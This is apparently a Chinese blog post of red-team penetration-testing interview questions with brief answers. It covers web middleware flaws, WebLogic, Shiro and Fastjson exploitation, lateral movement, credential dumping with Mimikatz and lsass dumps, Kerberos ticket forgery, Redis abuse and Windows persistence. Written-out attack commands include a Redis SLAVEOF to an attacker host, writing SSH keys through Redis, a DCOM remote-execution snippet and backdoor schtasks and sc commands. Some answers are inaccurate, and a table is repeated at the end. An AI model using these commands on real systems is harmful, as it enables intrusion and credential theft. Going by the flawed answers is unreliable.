2025年渗透测试面试题总结-渗透测试红队面试八（题目+回答）

网络安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

渗透测试红队面试八

二百一十一、常见中间件解析漏洞利用方式

二百一十二、MySQL用户密码存储与加密

二百一十三、Linux系统加固降权思路

二百一十四、绕过CDN获取真实IP

二百一十五、CMD查询远程开放端口

二百一十六、查找域控方法

二百一十七、CSRF成因及防御（非Token方案）

二百一十八、打点常用漏洞

二百一十九、Shiro漏洞发现方法

二百二十、WebLogic权限绕过

二百二十一、Fastjson漏洞原理

二百二十二、WebLogic漏洞类型

二百二十三、IIOP协议与类似技术

二百二十四、不出网漏洞利用方法

二百二十五、Webshell不出网应对措施

二百二十六、DNS出网协议利用

二百二十七、横向渗透命令执行手段

二百二十八、PsExec与WMIC区别

二百二十九、DCOM远程执行操作

二百三十、密码抓取方法

二百三十一、密码抓取版本限制

二百三十二、抓不到密码的应对

二百三十三、域内攻击方法

二百三十四、NTLM验证机制

二百三十五、Kerberos票据攻击

二百三十六、Windows Redis利用

二百三十七、Linux Redis利用

二百三十八、Windows后门方式

二百三十九、CS的哈希与密码获取

二百四十、收集RDP记录及对抗杀软

渗透测试红队面试八
二百一十一、说说常见的中间件解析漏洞利用方式

二百一十二、mysql的用户名密码是存放在那张表里面？mysql密码采用哪种加密方式？

二百一十三、Windows、Linux、数据库的加固降权思路，任选其一

二百一十四、如何绕过CDN获取目标网站真实IP，谈谈你的思路？

二百一十五、CMD命令行如何查询远程终端开放端口

二百一十六、怎么查找域控

二百一十七、CSRF 成因及防御措施；如果不用 token 如何做防御？

二百一十八、打点一般会用什么漏洞

二百一十九、平常怎么去发现shiro漏洞的

二百二十、weblogic权限绕过有没有了解

二百二十一、fastjson漏洞利用原理

二百二十二、weblogic有几种漏洞

二百二十三、IIOP听说过吗，和什么类似

二百二十四、这几个漏洞不出网情况下怎么办

二百二十五、拿到webshell不出网情况下怎么办

二百二十六、dns出网协议怎么利用

二百二十七、横向渗透命令执行手段

二百二十八、psexec和wmic或者其他的区别

二百二十九、Dcom怎么操作？

二百三十、抓取密码的话会怎么抓

二百三十一、什么版本之后抓不到密码

二百三十二、抓不到的话怎么办

二百三十三、域内攻击方法有了解过吗

二百三十四、ntlm验证机制

二百三十五、kerberos认证黄金、白银票据制作原理，以及需要哪个值

二百三十六、window redis 需要有哪些利用手段，除了写文件和启动项

二百三十七、linux redis 写有哪些利用方式

二百三十八、windows后门包括哪些方式

二百三十九、cs hashdump和logonpasswd 分别从哪里读取哈希和密码

二百四十、如何收集rdp连接记录，如果有杀软怎么办
二百一十一、常见中间件解析漏洞利用方式

IIS解析漏洞
目录解析：/test.asp;.jpg 被解析为ASP脚本（IIS6.0）。
分号截断：test.asp;.jpg 利用分号绕过扩展名检查。
PUT写文件：通过HTTP PUT方法上传脚本文件（需配置不当）。

Apache解析漏洞
多后缀解析：test.php.xxx 若.xxx未定义，按最后一个有效后缀解析（如.php）。
.htaccess覆盖：上传自定义.htaccess设置解析规则（如AddType application/x-httpd-php .jpg）。

Nginx解析漏洞
路径解析错误：/test.jpg/test.php 将test.jpg 作为PHP执行（Nginx + PHP-FPM配置不当）。
CVE-2013-4547：利用未正确处理空格和\0字符绕过检查（如test.jpg \0.php ）。

二百一十二、MySQL用户密码存储与加密

存储位置
表名：mysql.user 表存储用户名、主机权限及密码哈希。
字段：authentication_string（MySQL 5.7+）或password（旧版）。

加密方式
MySQL 4.1+：双重SHA1加密（SHA1(SHA1(password))）。
MySQL 8.0+：默认使用caching_sha2_password插件（SHA256哈希）。

补充信息
查询用户权限：SELECT user, host, authentication_string FROM mysql.user;
身份验证插件变更可能导致旧客户端兼容性问题（需启用mysql_native_password）。

二百一十三、Linux系统加固降权思路

最小权限原则
用户权限：创建低权限用户运行服务（如www-data运行Web服务）。
SUID/SGID清理：find / -perm /4000 -o -perm /2000查找并删除非必要特权文件。

服务与网络加固
禁用无用服务：systemctl disable vsftpd关闭FTP等非必要服务。
防火墙规则：iptables限制仅开放必要端口（如SSH仅允许特定IP）。

文件系统安全
敏感文件权限：chmod 600 /etc/shadow限制访问。
SELinux/AppArmor：启用强制访问控制，限制进程权限。

二百一十四、绕过CDN获取真实IP

历史记录查询
DNS历史：通过SecurityTrails、ViewDNS查询历史解析记录。
IP数据库：使用Censys或Shodan搜索目标域名早期绑定的IP。

子域名探测
爆破子域：subfinder或amass发现未使用CDN的子域（如dev.example.com ）。
邮件服务器：分析邮件头中Received字段获取服务器IP。

主动探测技巧
SSRF漏洞：利用目标站点的SSRF读取内网元数据（如AWS的169.254.169.254）。
全网段扫描：对目标域名解析的CDN IP段进行端口扫描，寻找非标准端口服务。

二百一十五、CMD查询远程开放端口

基础命令
Telnet：telnet <IP> <端口>（若连接成功则端口开放）。
Netstat：netstat -ano | findstr "ESTABLISHED"查看本地连接。

PowerShell工具
Test-NetConnection：Test-NetConnection <IP> -Port <端口>显示端口状态。

第三方工具
Nmap：nmap -p 1-1000 <IP>扫描指定端口范围。
PortQry：微软工具，支持批量端口检测。

二百一十六、查找域控方法
DNS查询
SRV记录：nslookup -type=SRV _ldap._tcp.dc._msdcs.< 域名>定位域控的LDAP服务。

系统命令
nltest：nltest /dclist:<域名>列出域控列表。
net命令：net group "Domain Controllers" /domain查询域控组。
LDAP查询
PowerShell：
powershellGet-ADDomainController -Discover -Service PrimaryDC | Select-Object Name, IPv4Address 
二百一十七、CSRF成因及防御（非Token方案）

漏洞成因
浏览器自动携带Cookie：攻击者诱导用户访问恶意页面，触发跨站请求。
无二次验证：敏感操作未校验请求来源。

防御措施（非Token）
SameSite Cookie：设置SameSite=Strict限制跨站请求。
Referer验证：检查HTTP头Referer是否来自合法域名。
CAPTCHA验证：关键操作前要求用户输入验证码。

二百一十八、打点常用漏洞

Web漏洞
SQL注入：通过注入获取数据库权限（如后台管理员凭证）。
文件上传：上传Webshell控制服务器（如绕过类型检查）。

服务漏洞
未授权访问：Redis、MongoDB等直接执行命令。
RCE漏洞：如Log4j2、Fastjson反序列化。

配置缺陷
默认密码：Tomcat、Jenkins等管理界面弱口令。
SSRF：利用内网探测或元数据服务攻击。

二百一十九、Shiro漏洞发现方法

Cookie特征识别
RememberMe字段：Base64解码后开头为x01x02x03或x04（序列化数据特征）。

漏洞扫描工具
ShiroExploit：自动化检测密钥及反序列化漏洞。
Burp插件：ShiroScan检测Cookie有效性。

手工检测
密钥爆破：利用已知密钥列表（如kPH+bIxk5D2deZiIxcaaaA==）测试反序列化。
DNSLog验证：构造恶意序列化数据触发DNS请求，确认漏洞存在。

二百二十、WebLogic权限绕过

CVE-2020-14882
未授权访问：访问/console/css/%252e%252e%252fconsole.portal 绕过控制台认证。
利用工具：weblogic-framework直接执行命令。

CVE-2021-2109
管理接口绕过：通过构造特殊URL路径访问后台功能。

修复建议
更新补丁，限制管理接口访问IP，启用强认证机制。

二百二十一、Fastjson漏洞原理

反序列化机制
@type指定类：攻击者通过JSON中的@type指定恶意类触发Gadget链。
JNDI注入：利用com.sun.rowset.JdbcRowSetImpl 等类加载远程恶意代码。

漏洞版本
<=1.2.24：默认支持autoType，可直接利用。
1.2.25-1.2.47：需绕过autoType检查（如利用L前缀或特殊类名）。

防御方案
升级至1.2.83+版本，关闭autoType功能，使用白名单机制。

二百二十二、WebLogic漏洞类型

反序列化漏洞
T3协议：CVE-2018-2628利用T3反序列化执行命令。
XMLDecoder：CVE-2017-10271通过WLS组件触发。

SSRF漏洞
CVE-2014-4210：uddiexplorer组件未限制内网请求。

权限绕过
CVE-2020-14825：绕过Console组件权限校验。

二百二十三、IIOP协议与类似技术

IIOP协议
用途：CORBA的通信协议，用于分布式对象调用。
类似技术：与RMI（Java远程方法调用）类似，均涉及序列化数据传输。

漏洞利用
反序列化攻击：通过IIOP传输恶意对象触发Gadget链（如WebLogic CVE-2020-2551）。

二百二十四、不出网漏洞利用方法

DNS/ICMP隧道
DNS协议：使用dnscat2通过DNS查询传输数据。
ICMP协议：利用ptunnel或icmpsh建立隐蔽通道。

内网服务中继
SMB Relay：通过Responder工具捕获NTLM哈希并中继至其他主机。

Web反向连接
HTTP文件传输：通过Web服务上传/下载文件（如Python http.server ）。

二百二十五、Webshell不出网应对措施

内网探测
扫描内网段：使用for /L %i in (1,1,255) do ping -n 1 192.168.1.%i发现存活主机。

利用现有服务
数据库外联：通过MySQL SELECT ... INTO OUTFILE写入Web目录。
邮件发送：使用SMTP协议将数据外传。

内存加载
PowerShell脚本：反射加载恶意代码，避免落地文件。

二百二十六、DNS出网协议利用

DNS隧道
工具：dnscat2建立加密隧道，执行命令或传输文件。
隐蔽性：利用TXT或CNAME记录传输数据，绕过防火墙检测。

数据渗透
子域名携带数据：data.example.com 解析为Base64编码的敏感信息。

二百二十七、横向渗透命令执行手段

PsExec
特点：需目标开启ADMIN$共享，生成服务执行命令，日志明显。

WMI
命令：wmic /node:<IP> process call create "cmd.exe /c whoami"
优势：无需安装客户端，基于135端口。

SSH密钥利用
条件：获取目标SSH私钥，通过ssh -i id_rsa user@ip直接登录。

二百二十八、PsExec与WMIC区别

PsExec WMIC
需目标开启ADMIN$共享和文件写入权限。仅需135端口和有效凭证，无需文件操作。
生成服务进程，日志记录明显（svchost）。通过WMI协议执行，日志较隐蔽。
适合批量操作，但易触发告警。更隐蔽，但命令长度受限。

二百二十九、DCOM远程执行操作
原理
DCOM接口：通过COM对象远程调用方法（如MMC20.Application）。
利用步骤
列出DCOM对象：Get-CimInstance Win32_DCOMApplication
执行命令：
powershell$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<IP>")) $com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami", "7")
二百三十、密码抓取方法

Mimikatz
命令：sekurlsa::logonpasswords提取内存中的明文密码和哈希。

注册表导出
SAM/SYSTEM文件：reg save HKLM\SAM SAM.bak 导出后使用secretsdump解析。

Procdump转储
转储LSASS：procdump.exe -ma lsass.exe lsass.dmp ，本地用Mimikatz解析。

二百三十一、密码抓取版本限制

Windows 8.1/Server 2012+
WDigest禁用：默认不缓存明文密码（需启用注册表项UseLogonCredential）。

Windows 10/Server 2016+
LSASS保护：启用Credential Guard后无法直接读取内存密码。

二百三十二、抓不到密码的应对

哈希传递（Pass-the-Hash）
工具：psexec.py 或crackmapexec使用NTLM哈希横向移动。

Kerberos票据
黄金票据：利用krbtgt哈希伪造TGT，访问任意服务。

二百三十三、域内攻击方法

横向移动
MS17-010：利用永恒之蓝漏洞攻击未修补主机。

权限提升
ACL滥用：修改域对象的ACL，授予自身特权（如DCsync权限）。

持久化
Skeleton Key：植入恶意域控后门，使用万能密码登录。

二百三十四、NTLM验证机制

三步握手
协商：客户端发送NEGOTIATE_MESSAGE。
挑战：服务器返回CHALLENGE_MESSAGE（包含随机Nonce）。
认证：客户端使用密码哈希加密Nonce生成RESPONSE_MESSAGE。

中间人攻击
NTLM Relay：将认证请求中继至其他服务器，执行命令或获取权限。

二百三十五、Kerberos票据攻击

黄金票据
原理：伪造TGT票据，需krbtgt的NTLM哈希和域SID。
用途：访问域内任意服务。

白银票据
原理：伪造特定服务的ST票据，需服务账户哈希和服务SPN。
用途：仅限访问特定服务（如CIFS文件共享）。

二百三十六、Windows Redis利用
主从复制RCE
步骤：设置恶意主节点，同步module.dll 执行命令。
命令：
bashredis-cli -h <target> SLAVEOF <attacker-ip> 6379 
计划任务劫持
写入任务：通过CONFIG SET dir和dbfilename写入恶意任务文件。
二百三十七、Linux Redis利用
SSH密钥写入
命令：
basredis-cli -h <target> config set dir /root/.ssh redis-cli -h <target> config set dbfilename "authorized_keys" redis-cli -h <target> set x "\n\nssh-rsa AAAAB3Nz...\n\n" redis-cli -h <target> save 
Crontab后门
写入任务：设置定时任务反弹Shell。
二百三十八、Windows后门方式

注册表启动项
路径：HKLM\Software\Microsoft\Windows\CurrentVersion\Run

计划任务
命令：schtasks /create /tn "Update" /tr "C:\evil.exe" /sc onstart

服务后门
创建服务：sc create EvilService binPath= "C:\evil.exe" start= auto

二百三十九、CS的哈希与密码获取

hashdump
来源：从LSASS进程内存中提取NTLM哈希。

logonpasswords
来源：从Windows凭据管理器获取明文密码（需WDigest启用）。

二百四十、收集RDP记录及对抗杀软

记录位置
注册表：HKCU\Software\Microsoft\Terminal Server Client\Servers
日志文件：%USERPROFILE%\Documents\Default.rdp

绕过杀软
离线提取：直接复制注册表文件或日志到本地分析。
隐蔽工具：使用PowerShell脚本读取注册表，避免触发行为检测。

PsExec	WMIC
需目标开启ADMIN$共享和文件写入权限。	仅需135端口和有效凭证，无需文件操作。
生成服务进程，日志记录明显（svchost）。	通过WMI协议执行，日志较隐蔽。
适合批量操作，但易触发告警。	更隐蔽，但命令长度受限。